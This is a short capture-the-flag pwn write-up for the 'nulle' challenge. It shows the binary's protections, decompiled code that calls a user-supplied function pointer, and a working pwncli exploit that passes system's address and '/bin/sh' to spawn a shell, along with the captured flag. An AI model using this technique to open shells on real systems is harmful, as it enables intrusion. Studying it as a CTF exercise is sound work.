pwn - nulle
题目描述:Our developer got a bit too clever with C structs. They decided that if two structs have the same fields, just in a different order, it’s fine to cast between them.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
No PIE!!!
analysis
ida F5:
__int64 __fastcall main(int a1, char **a2, char **a3)
{
psub_4011D5 = (__int64 (__fastcall *)())printf_w;
printf_w((char *)is_your_n); // "is your\n"
init();
puts("please input something");
read(
0,
is_your_n, // "is your\n"
0x100u);
sub_401203(is_your_n); // "is your\n"
return 0;
}
/* Orphan comments:
"is your\n"
*/
__int64 __fastcall sub_401203(__int64 (__fastcall **is_your_n)(char *))
{
return (*is_your_n)((char *)is_your_n + 8);
}
import function:
.dynsym
00000000004041B0 __libc_start_main@@GLIBC_2.34 .dynsym
00000000004041B8 puts@@GLIBC_2.2.5 .dynsym
00000000004041C0 system@@GLIBC_2.2.5 .dynsym
00000000004041C8 printf@@GLIBC_2.2.5 .dynsym
00000000004041D0 read@@GLIBC_2.2.5 .dynsym
00000000004041D8 setvbuf@@GLIBC_2.2.5 .dynsym
00000000004041E0 __gmon_start__ .dynsym
没有PIE,存在system函数导入,主函数功能是读取0x100字节,前8字节被当成地址,之后的内容被当作字符串传入该地址,进行函数调用
构造出:system("/bin/sh\x00"),即可
exp
#!/usr/bin/env python3
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
payload = pack(elf.sym.system) + b"/bin/sh\x00"
ru(b"input")
sl(payload)
ia()
$ cat home/solver/flag.txt
[DEBUG] Sent 0x19 bytes:
b'cat home/solver/flag.txt\n'
[DEBUG] Received 0x45 bytes:
b'CTF{53c4abb4d8484a0dceb0840356114dc43dabc0855ae22d84ae5bba996aa54c0a}'
CTF{53c4abb4d8484a0dceb0840356114dc43dabc0855ae22d84ae5bba996aa54c0a}[*] Got EOF while reading in interactive